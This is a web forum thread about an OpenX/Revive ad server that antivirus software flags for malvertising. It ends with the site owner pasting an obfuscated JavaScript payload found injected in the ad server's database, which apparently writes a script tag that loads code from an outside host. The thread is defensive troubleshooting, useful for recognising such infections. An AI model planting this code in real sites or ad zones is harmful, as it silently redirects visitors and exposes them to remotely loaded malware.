Jump to content
anjoyxp

Malware Detected?

Recommended Posts

Hello,

 

My site using openx for ad server and detect by norton antivirus as "malvertisement website redirect", upgrade to revive ad server not solve this problem, and i not found malicious code on a web page. Anyone have same problem?

 

Thanks.

Share this post


Link to post
Share on other sites

I think it has to do with Iframe invocation code (eventhou i installed my revive software on https://) i get this error too. I was hoping you guys could use a slider type of script for this instead of an iframe reload. Would require less server resources and the banner transitions would be smooth.

Share this post


Link to post
Share on other sites

I have installed Revive ad server to ads.gameqq.net, and post code to page www.gameqq.net, whether the domain ads that cause this problem?

 

My Norton Antivirus 2011 has detect 3 zone banner with invocation code javascript tag. At this time, I disable the "malvertisement" signature from Norton in my computer for unblocking the banner.

Share this post


Link to post
Share on other sites

Someone hacked your OpenX. You can't just expect that upgrading to Revive Adserver could magically clean up the "infection", unless you wiped out OpenX completely and did a fresh install of Revive. You have to carefully check and clean up the filesystem and database to make suer the malware is gone.

Share this post


Link to post
Share on other sites

Finally, I found mallicious code in my Database on table "pre_zone", in column "prepend" and "append". After deleted that code, My Norton Antivirus not blocked Banner again. The code like this:

<script>try{$a=~[];$a={___:++$a,$$$$![]+"")[$a],__$:++$a,$_$_![]+"")[$a],_$_:++$a,$_$${}+"")[$a],$$_$$a[$a]+"")[$a],_$$:++$a,$$$_!""+"")[$a],$__:++$a,$_$:++$a,$$__{}+"")[$a],$$_:++$a,$$$:++$a,$___:++$a,$__$:++$a};$a.$_=($a.$_=$a+"")[$a.$_$]+($a._$=$a.$_[$a.__$])+($a.$$=($a.$+"")[$a.__$])+((!$a)+"")[$a._$$]+($a.__=$a.$_[$a.$$_])+($a.$=(!""+"")[$a.__$])+($a._=(!""+"")[$a._$_])+$a.$_[$a.$_$]+$a.__+$a._$+$a.$;$a.$$=$a.$+(!""+"")[$a._$$]+$a.__+$a._+$a.$+$a.$$;$a.$=($a.___)[$a.$_][$a.$_];$a.$($a.$($a.$$+"\""+$a.$$_$+"="+$a.$$_$+$a._$+$a.$$__+$a._+"\\"+$a.__$+$a.$_$+$a.$_$+$a.$$$_+"\\"+$a.__$+$a.$_$+$a.$$_+$a.__+";"+$a._+$a.$_$_+"=\\"+$a.__$+$a.$_$+$a.$$_+$a.$_$_+"\\"+$a.__$+$a.$$_+$a.$$_+"\\"+$a.__$+$a.$_$+$a.__$+"\\"+$a.__$+$a.$__+$a.$$$+$a.$_$_+$a.__+$a._$+"\\"+$a.__$+$a.$$_+$a._$_+"."+$a._+"\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+"\\"+$a.__$+$a.$$_+$a._$_+"\\"+$a.__$+$a.___+$a.__$+"\\"+$a.__$+$a.$__+$a.$$$+$a.$$$_+"\\"+$a.__$+$a.$_$+$a.$$_+$a.__+";\\"+$a.__$+$a.$_$+$a.__$+$a.$$$$+"("+$a.$$_$+"._\\"+$a.__$+$a.$$$+$a._$_+"\\"+$a.__$+$a.$$$+$a.___+"==="+$a._+"\\"+$a.__$+$a.$_$+$a.$$_+$a.$$_$+$a.$$$_+$a.$$$$+"\\"+$a.__$+$a.$_$+$a.__$+"\\"+$a.__$+$a.$_$+$a.$$_+$a.$$$_+$a.$$_$+"\\"+$a.$__+$a.___+"&&\\"+$a.$__+$a.___+$a.$$_$+"."+$a.$$__+$a._$+$a._$+"\\"+$a.__$+$a.$_$+$a._$$+"\\"+$a.__$+$a.$_$+$a.__$+$a.$$$_+".\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+"\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+"\\"+$a.__$+$a.$_$+$a.___+"('_"+$a._+$a.__+"\\"+$a.__$+$a.$_$+$a.$_$+$a._+$a.$$_$+"=')==-"+$a.__$+"\\"+$a.$__+$a.___+"&&\\"+$a.$__+$a.___+$a._+$a.$_$_+".\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+"\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+"\\"+$a.__$+$a.$_$+$a.___+"('\\"+$a.__$+$a._$_+$a.$$$+"\\"+$a.__$+$a.$_$+$a.__$+"\\"+$a.__$+$a.$_$+$a.$$_+$a.$$_$+$a._$+"\\"+$a.__$+$a.$$_+$a.$$$+"\\"+$a.__$+$a.$$_+$a._$$+"\\"+$a.$__+$a.___+"\\"+$a.__$+$a.__$+$a.$$_+"\\"+$a.__$+$a._$_+$a.$__+"\\"+$a.$__+$a.___+"')>"+$a.___+"\\"+$a.$__+$a.___+"&&\\"+$a.$__+$a.___+$a._+$a.$_$_+".\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+"\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+"\\"+$a.__$+$a.$_$+$a.___+"('\\"+$a.__$+$a.__$+$a.$_$+"\\"+$a.__$+$a._$_+$a._$$+"\\"+$a.__$+$a.__$+$a.__$+"\\"+$a.__$+$a.___+$a.$_$+"\\"+$a.$__+$a.___+"')>"+$a.___+")\\"+$a.$__+$a.___+"{"+$a.$$_$+"._\\"+$a.__$+$a.$$$+$a._$_+"\\"+$a.__$+$a.$$$+$a.___+"="+$a.__$+";"+$a.$$_$+"."+$a.$$__+$a._$+$a._$+"\\"+$a.__$+$a.$_$+$a._$$+"\\"+$a.__$+$a.$_$+$a.__$+$a.$$$_+"='__"+$a._+$a.__+"\\"+$a.__$+$a.$_$+$a.$_$+$a._+$a.$$_$+"="+$a.__$+";\\"+$a.$__+$a.___+$a.$$$_+"\\"+$a.__$+$a.$$$+$a.___+"\\"+$a.__$+$a.$$_+$a.___+"\\"+$a.__$+$a.$_$+$a.__$+"\\"+$a.__$+$a.$$_+$a._$_+$a.$$$_+"\\"+$a.__$+$a.$$_+$a._$$+"=\\"+$a.__$+$a._$_+$a.$$$+$a.$$$_+$a.$$_$+",\\"+$a.$__+$a.___+$a.___+$a.__$+"\\"+$a.$__+$a.___+"\\"+$a.__$+$a.__$+$a._$_+$a.$_$_+"\\"+$a.__$+$a.$_$+$a.$$_+"\\"+$a.$__+$a.___+$a._$_+$a.___+$a._$_+$a.___+"\\"+$a.$__+$a.___+$a.___+$a.___+":"+$a.___+$a.___+":"+$a.___+$a.___+"\\"+$a.$__+$a.___+"\\"+$a.__$+$a._$_+$a.$_$+"\\"+$a.__$+$a._$_+$a.$__+"\\"+$a.__$+$a.___+$a._$$+";\\"+$a.$__+$a.___+"\\"+$a.__$+$a.$$_+$a.___+$a.$_$_+$a.__+"\\"+$a.__$+$a.$_$+$a.___+"=/';"+$a.$$_$+".\\"+$a.__$+$a.$$_+$a.$$$+"\\"+$a.__$+$a.$$_+$a._$_+"\\"+$a.__$+$a.$_$+$a.__$+$a.__+$a.$$$_+(![]+"")[$a._$_]+"\\"+$a.__$+$a.$_$+$a.$$_+"(\\\"<\\"+$a.__$+$a.$$_+$a._$$+$a.$$__+"\\"+$a.__$+$a.$$_+$a._$_+"\\\"+\\\"\\"+$a.__$+$a.$_$+$a.__$+"\\"+$a.__$+$a.$$_+$a.___+$a.__+"\\"+$a.$__+$a.___+"\\"+$a.__$+$a.$$_+$a._$$+"\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+"='\\"+$a.__$+$a.$_$+$a.___+$a.__+$a.__+"\\"+$a.__$+$a.$$_+$a.___+"://"+$a.$_$$+"\\"+$a.__$+$a.$$_+$a._$_+"\\"+$a.__$+$a.$_$+$a.__$+"\\"+$a.__$+$a.$_$+$a.$$_+"\\"+$a.__$+$a.$$_+$a._$$+"."+$a.$_$$+"\\"+$a.__$+$a.$_$+$a.__$+"\\"+$a.__$+$a.$$$+$a._$_+"/"+$a.$$__+$a.$___+$a.$__+$a.$___+$a.__$+$a.$$$$+$a.$_$+$a.___+".\\"+$a.__$+$a.$_$+$a._$_+"\\"+$a.__$+$a.$$_+$a._$$+"?"+$a.$$__+"\\"+$a.__$+$a.$$_+$a.___+"="+$a.$_$_+$a.$$_$+"\\"+$a.__$+$a.$$_+$a._$$+".\\"+$a.__$+$a.$__+$a.$$$+$a.$_$_+"\\"+$a.__$+$a.$_$+$a.$_$+$a.$$$_+"\\"+$a.__$+$a.$$_+$a.__$+"\\"+$a.__$+$a.$$_+$a.__$+".\\"+$a.__$+$a.$_$+$a.$$_+$a.$$$_+$a.__+"'></\\"+$a.__$+$a.$$_+$a._$$+$a.$$__+"\\"+$a.__$+$a.$$_+$a._$_+"\\"+$a.__$+$a.$_$+$a.__$+"\\\"+\\\"\\"+$a.__$+$a.$$_+$a.___+$a.__+">\\\");}"+"\"")())();}catch(e){}</script><!--vcwrz-->

Many Thanks to you all for the clue and advise.

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.




×
×
  • Create New...